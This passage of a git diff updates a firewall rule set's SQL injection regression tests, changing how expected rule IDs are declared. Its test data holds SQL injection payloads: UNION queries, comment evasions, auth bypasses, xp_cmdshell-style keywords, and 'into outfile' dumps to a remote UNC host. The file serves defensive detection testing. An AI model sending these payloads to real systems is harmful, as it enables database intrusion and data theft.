Sequence" stages: @@ -241,7 +255,8 @@ tests: uri: "/post" data: "test=0/**/union/*!50000select*/table_name`foo`/**/" output: - log_contains: id "942440" + log: + expect_ids: [942440] - test_id: 16 desc: "Avoid False Positive on JWT (body)" stages: @@ -256,7 +271,8 @@ tests: uri: "/post" data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 17 desc: "Avoid False Positive on JWT (cookie)" stages: @@ -272,7 +288,8 @@ tests: uri: "/post" data: "foo=bar" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 18 desc: "Avoid False Positive on JWT (querystring)" stages: @@ -286,7 +303,8 @@ tests: version: "HTTP/1.1" uri: "/get/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 19 desc: "False positive against Facebook click identifier" stages: @@ -300,7 +318,8 @@ tests: version: "HTTP/1.1" uri: "/get?fbclid=IwAR1dug0BYxe0ukhZ2vKrdQwLAxVFRJ--Q2Y7OBJE_0uId9-Eh-sJWLdVk2E" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] - test_id: 20 desc: "False positive against Google click identifier" stages: @@ -314,4 +333,5 @@ tests: version: "HTTP/1.1" uri: "/get?gclid=j0KCQiA1NebBhDDARIsAANiDD3_RJeMv8zScF--mC1jf8fO8PDYJCxD9xdwT7iQ59QIIwL-86ncQtMaAh0lEALw_wcB" output: - no_log_contains: id "942440" + log: + no_expect_ids: [942440] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 7d86d5a89..6254021d0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -18,7 +18,8 @@ tests: data: "var=%5c0xf00dsdfdsa" version: HTTP/1.0 output: - log_contains: id "942450" + log: + expect_ids: [942450] - test_id: 2 desc: "SQL Hex Encoding" stages: @@ -34,7 +35,8 @@ tests: data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" version: HTTP/1.0 output: - log_contains: id "942450" + log: + expect_ids: [942450] - test_id: 3 desc: "SQL Hex Encoding" stages: @@ -50,7 +52,8 @@ tests: data: "var=select%200x616263" version: HTTP/1.0 output: - log_contains: id "942450" + log: + expect_ids: [942450] - test_id: 4 desc: "SQL Hex Encoding - negative" stages: @@ -66,7 +69,8 @@ tests: data: "var=IHRlc3Q0xAcF" version: HTTP/1.0 output: - no_log_contains: id "942450" + log: + no_expect_ids: [942450] - test_id: 5 desc: "SQL Hex Encoding - negative" stages: @@ -82,4 +86,5 @@ tests: data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" version: HTTP/1.0 output: - no_log_contains: id "942450" + log: + no_expect_ids: [942450] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 7ce8f78c5..49e020b98 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -18,7 +18,8 @@ tests: data: "var=foo...." version: HTTP/1.1 output: - log_contains: id "942460" + log: + expect_ids: [942460] - test_id: 2 desc: "Repetitive Non-Word Characters negative test only 3 characters" stages: @@ -34,4 +35,5 @@ tests: data: "var=foo..." version: HTTP/1.1 output: - no_log_contains: id "942460" + log: + no_expect_ids: [942460] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index 894edcb3e..72caff6e7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -18,7 +18,8 @@ tests: data: "pay=nvarchar" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -34,7 +35,8 @@ tests: data: "pay=xp_cmdshell" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 3 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: data: "pay=varchar" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 4 desc: "SQL Injection Attack" stages: @@ -66,7 +69,8 @@ tests: data: "pay=xp_dirtree" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 5 desc: "SQL Injection Attack" stages: @@ -82,7 +86,8 @@ tests: data: "pay=xp_regread" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 6 desc: "SQL Injection Attack" stages: @@ -98,7 +103,8 @@ tests: data: "pay=sp_password" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 7 desc: "SQL Injection Attack" stages: @@ -114,7 +120,8 @@ tests: data: "pay=UTL_HTTP" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 8 desc: "SQL Injection Attack" stages: @@ -130,7 +137,8 @@ tests: data: "pay=OPENROWSET" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 9 desc: "SQL Injection Attack" stages: @@ -146,7 +154,8 @@ tests: data: "pay=sp_executesql" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 10 desc: "SQL Injection Attack" stages: @@ -162,7 +171,8 @@ tests: data: "sp_executesql" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] - test_id: 11 desc: "SQL Injection Attack: current_user" stages: @@ -177,4 +187,5 @@ tests: uri: "/get/index.php?id=1%2bcurrent_user::int" version: HTTP/1.0 output: - log_contains: id "942470" + log: + expect_ids: [942470] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index e0b642eec..e12ca7023 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -19,7 +19,8 @@ tests: uri: "/?'msdasql'" version: HTTP/1.0 output: - log_contains: "id \"942480" + log: + expect_ids: [942480] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?'msdasql'" version: HTTP/1.0 output: - log_contains: "id \"942480" + log: + expect_ids: [942480] - test_id: 2 desc: "SQL Injection Attack" stages: @@ -50,7 +52,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: "id \"942480" + log: + expect_ids: [942480] - test_id: 3 desc: "Data dump using 'into outfile'" stages: @@ -66,7 +69,8 @@ tests: data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 4 desc: "Data dump using 'into outfile'" stages: @@ -82,7 +86,8 @@ tests: data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 5 desc: "SQL injection using 'UNION ALL" stages: @@ -98,7 +103,8 @@ tests: data: "var=0.3480567293179807' UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 6 desc: "SQL injection using 'UNION ALL" stages: @@ -114,7 +120,8 @@ tests: data: "var=config.ini\") UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 7 desc: "SQL injection using 'UNION ALL" stages: @@ -130,7 +137,8 @@ tests: data: "var=CRS) UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 8 desc: "SQL injection using 'UNION ALL" stages: @@ -146,7 +154,8 @@ tests: data: "var=CRS3\") UNION ALL select NULL --" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 9 desc: "SQL injection using 'overlay(...placing..)" stages: @@ -161,7 +170,8 @@ tests: uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 10 desc: "SQL injection in User-Agent" stages: @@ -176,7 +186,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 11 desc: "SQL injection in arbitrary header" stages: @@ -192,7 +203,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] - test_id: 12 desc: "SQL injection using 'overlay(...placing..) with newlines" stages: @@ -207,4 +219,5 @@ tests: uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" version: HTTP/1.0 output: - log_contains: id "942480" + log: + expect_ids: [942480] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 1f4a15f8c..d91924c63 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -18,7 +18,8 @@ tests: data: "var=%22%60%20%2A%20123" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 2 desc: "classic SQL injection probings 3/3" stages: @@ -34,7 +35,8 @@ tests: data: "' ', 10" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 3 desc: "classic SQL injection probings 3/3" stages: @@ -50,7 +52,8 @@ tests: data: "'', '', '', '', '', '', '', '', 13" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 4 desc: "classic SQL injection probings 3/3" stages: @@ -66,7 +69,8 @@ tests: data: "`>65" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 5 desc: "classic SQL injection probings 3/3" stages: @@ -82,7 +86,8 @@ tests: data: "pay='1001'='10" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 6 desc: "classic SQL injection probings 3/3" stages: @@ -98,7 +103,8 @@ tests: data: "\"2562*23" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 7 desc: "classic SQL injection probings 3/3" stages: @@ -114,7 +120,8 @@ tests: data: "pay=\":[\"00" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 8 desc: "classic SQL injection probings 3/3" stages: @@ -130,7 +137,8 @@ tests: data: "pay=`>6fbdec2" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 9 desc: "classic SQL injection probings 3/3" stages: @@ -146,7 +154,8 @@ tests: data: "pay='][0]]), strtolower($b[$GLOBALS['" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 10 desc: "classic SQL injection probings 3/3" stages: @@ -162,7 +171,8 @@ tests: data: "pay=', 2, 1" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 11 desc: "classic SQL injection probings 3/3" stages: @@ -178,7 +188,8 @@ tests: data: "`>9e7" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 12 desc: "classic SQL injection probings 3/3" stages: @@ -194,7 +205,8 @@ tests: data: "pay=\":\"65" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 13 desc: "classic SQL injection probings 3/3" stages: @@ -210,7 +222,8 @@ tests: data: "pay='\\2nq5" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 14 desc: "classic SQL injection probings 3/3" stages: @@ -226,7 +239,8 @@ tests: data: "pay=` < 0) AND `" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 15 desc: "classic SQL injection probings 3/3" stages: @@ -242,7 +256,8 @@ tests: data: "pay='0:0:6" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 16 desc: "classic SQL injection probings 3/3" stages: @@ -258,7 +273,8 @@ tests: data: "\":60" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 17 desc: "classic SQL injection probings 3/3" stages: @@ -274,7 +290,8 @@ tests: data: "pay=\">%5 - type_submit_reset_5" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 18 desc: "classic SQL injection probings 3/3" stages: @@ -290,7 +307,8 @@ tests: data: "\":35" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 19 desc: "classic SQL injection probings 3/3" stages: @@ -306,7 +324,8 @@ tests: data: "pay='3085'='30" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 20 desc: "classic SQL injection probings 3/3" stages: @@ -322,7 +341,8 @@ tests: data: "\":\"[0,\\x22" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 21 desc: "classic SQL injection probings 3/3" stages: @@ -338,7 +358,8 @@ tests: data: "pay='16/17" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] - test_id: 22 desc: "classic SQL injection probings 3/3" stages: @@ -354,4 +375,5 @@ tests: data: "\";}7b6" version: HTTP/1.0 output: - log_contains: id "942490" + log: + expect_ids: [942490] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 2e5c69a02..54e148077 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" version: HTTP/1.0 output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" stages: @@ -33,7 +34,8 @@ tests: uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" version: HTTP/1.0 output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: @@ -48,7 +50,8 @@ tests: uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" version: "HTTP/1.1" output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: @@ -63,7 +66,8 @@ tests: uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" version: "HTTP/1.1" output: - log_contains: id "942500" + log: + expect_ids: [942500] - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: @@ -78,4 +82,5 @@ tests: uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" version: HTTP/1.0 output: - log_contains: id "942500" + log: + expect_ids: [942500] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index 1b91b767f..f350dee55 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?`bla`" version: HTTP/1.0 output: - log_contains: id "942510" + log: + expect_ids: [942510] - test_id: 2 desc: "SQLi bypass detected: backticks" stages: @@ -32,4 +33,5 @@ tests: uri: "/get?'bla'" version: HTTP/1.0 output: - no_log_contains: id "942510" + log: + no_expect_ids: [942510] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index f2c76b472..7dd1d827b 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?`bla`" version: HTTP/1.0 output: - no_log_contains: id "942511" + log: + no_expect_ids: [942511] - test_id: 2 desc: "SQLi bypass detected: quotes" stages: @@ -32,4 +33,5 @@ tests: uri: "/get?'bla'" version: HTTP/1.0 output: - log_contains: id "942511" + log: + expect_ids: [942511] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 7bd43221f..be7dd030a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml @@ -19,7 +19,8 @@ tests: data: "var=id'is%20not-id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 2 desc: "Negative test: 'is notes" stages: @@ -35,7 +36,8 @@ tests: data: "var=id'is%20notes" version: HTTP/1.0 output: - no_log_contains: id "942520" + log: + no_expect_ids: [942520] - test_id: 3 desc: "Detects basic SQL auth bypass with 'not like something'" stages: @@ -51,7 +53,8 @@ tests: data: "var=id'not%20like%20id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 4 desc: "Detects basic SQL auth bypass with 'not glob'" stages: @@ -67,7 +70,8 @@ tests: data: "var=id'not%20glob-id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 5 desc: "Detects basic SQL auth bypass with 'not like glob'" stages: @@ -83,7 +87,8 @@ tests: data: "var=id'not%20glob-id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 6 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -100,7 +105,8 @@ tests: data: "var=x'%7Cemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 7 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -117,7 +123,8 @@ tests: data: "var=x'-email--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 8 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -134,7 +141,8 @@ tests: data: "var=x'%252Bemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 9 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -151,7 +159,8 @@ tests: data: "var=x'%5Eemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 10 desc: "Nagive test: Detects basic SQL auth bypass with binary operators" stages: @@ -168,7 +177,8 @@ tests: data: "var=x'%40email--" version: HTTP/1.0 output: - no_log_contains: id "942520" + log: + no_expect_ids: [942520] - test_id: 11 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -185,7 +195,8 @@ tests: data: "var=x'%26email--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 12 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -202,7 +213,8 @@ tests: data: "var=x'%3Cemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 13 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -219,7 +231,8 @@ tests: data: "var=x'%3Eemail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 14 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -236,7 +249,8 @@ tests: data: "var=x'%3Demail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 15 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -253,7 +267,8 @@ tests: data: "var=x'%2Femail--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 16 desc: "Detects basic SQL auth bypass with binary operators" stages: @@ -270,7 +285,8 @@ tests: data: "var=x'%25email--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 17 desc: "Negative test: Detects basic SQL auth bypass with binary operators" stages: @@ -287,7 +303,8 @@ tests: data: "var=x'~email--" version: HTTP/1.0 output: - no_log_contains: id "942520" + log: + no_expect_ids: [942520] - test_id: 18 desc: "Detects basic SQL auth bypass with mod" stages: @@ -303,7 +320,8 @@ tests: data: "var=x'%20mod%20id--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 19 desc: "Detects basic SQL auth bypass with: sounds like" stages: @@ -319,7 +337,8 @@ tests: data: "var='sounds%20like%20rowid--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 20 desc: "Bypass with a comment" stages: @@ -335,7 +354,8 @@ tests: data: "var='%2F**%2F*2--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] - test_id: 21 desc: "Integration test: 942521 blocks foo'or'oof" stages: @@ -351,7 +371,8 @@ tests: data: "var=foo'or'oof" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 22 desc: "Integration test: 942522 blocks foo\\''or'oof" stages: @@ -367,7 +388,8 @@ tests: data: "var=foo%5c''or'oof" version: HTTP/1.0 output: - log_contains: id "942522" + log: + expect_ids: [942522] - test_id: 23 desc: "Detect auth bypass email=' is not?--" stages: @@ -383,4 +405,5 @@ tests: data: "email=%27%20is%20not%3F--" version: HTTP/1.0 output: - log_contains: id "942520" + log: + expect_ids: [942520] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml index e01b0059b..29eec3976 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml @@ -19,7 +19,8 @@ tests: data: "var=a'or'a" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 2 desc: "Detects basic SQLite authentication bypass with 'or?'" stages: @@ -35,7 +36,8 @@ tests: data: "var=a'or?--" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 3 desc: "False-positive: Detects or-based authentication bypass" stages: @@ -51,7 +53,8 @@ tests: data: "var=is%20this%20your%20parents'%20or%20yours?" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 4 desc: "Detects basic SQL auth bypass and-based" stages: @@ -67,7 +70,8 @@ tests: data: "var=user'and%20id%20is%20not?--" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 5 desc: "False-positve: is it your parents' or yours" stages: @@ -83,7 +87,8 @@ tests: data: "var=it%20is%20your%20parents'%20and%20yours" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 6 desc: "Negative test: bob's or alice's" stages: @@ -99,7 +104,8 @@ tests: data: "var=bob's%20or%20alice's" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 7 desc: "Negative test: mother or daugher" stages: @@ -115,7 +121,8 @@ tests: data: "var=mother%20or%20daughter" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 8 desc: "Negative test: 'oreo" stages: @@ -131,7 +138,8 @@ tests: data: "var='oreo" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 9 desc: "Negative test: 'fork" stages: @@ -147,7 +155,8 @@ tests: data: "var='fork" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 10 desc: "Negative test: 'for" stages: @@ -163,7 +172,8 @@ tests: data: "var='%20for" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 11 desc: "Negative test: ''or" stages: @@ -179,7 +189,8 @@ tests: data: "var=''or" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 12 desc: "Negative test: 'books' or 'applles'" stages: @@ -195,7 +206,8 @@ tests: data: "var=''or" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 13 desc: "Negative test: bob's presentation's 'or'" stages: @@ -211,7 +223,8 @@ tests: data: "var=''or" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 14 desc: "Bypass with '''or 1" stages: @@ -227,7 +240,8 @@ tests: data: "var='''or%201" version: HTTP/1.0 output: - log_contains: id "942521" + log: + expect_ids: [942521] - test_id: 15 desc: "False-negative: Not detected with escapes" stages: @@ -243,7 +257,8 @@ tests: data: "var=%5C'lol'%20or%20'1" version: HTTP/1.0 output: - no_log_contains: id "942521" + log: + no_expect_ids: [942521] - test_id: 16 desc: "Negative test: Wikipedia article about SQLi" stages: @@ -259,7 +274,8 @@ tests: data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20q